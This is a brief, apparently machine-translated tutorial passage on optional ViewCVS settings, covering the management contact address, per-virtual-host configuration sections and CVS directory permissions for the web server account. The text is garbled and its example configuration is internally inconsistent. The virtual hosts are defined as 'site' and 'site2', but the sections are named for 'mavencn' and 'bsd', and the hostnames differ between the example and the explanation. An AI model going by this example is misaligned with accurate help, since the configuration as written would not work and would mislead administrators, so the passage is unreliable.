2) In addition to the basic settings, there are other settings that are also useful. Here we will explain some useful settings.
Other settings in [general]

address is used to set the email of the management contact displayed on the page

address = HD


[vhosts] virtual host support

3 ) If you have multiple virtual hosts to use the same cgi, you will find each host Different settings of viewcvs.conf may be required, which is why the setting of vhost is possible in viewcvs.conf. This is the original description of

viewcvs.conf : # vhost1 = glob1, glob2
# vhost2 = glob3, glob4

# [vhost1-section]
# option = value
# [vhost1-othersection]
# option = value
# [vhost2-section]
# option = value


4) can be seen at a glance, use a name for a virtual host, and explain the virtual host The corresponding url. Each virtual host can set all section attributes, and the name of the section plus the name of the virtual host is sufficient. This is an example I set up:

site = site.example.com
site2 = site2.dns exmaple.com

[mavencn-general]
default_root = maven

[bsd-general]
default_root = bsdhowto

5) I set up two virtual hosts: mavencn and bsd Corresponding to site.example.com and site.example2dns.com respectively. The default_root attribute in the general section is set for the two virtual hosts below.

🦑 Installation precautions

First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁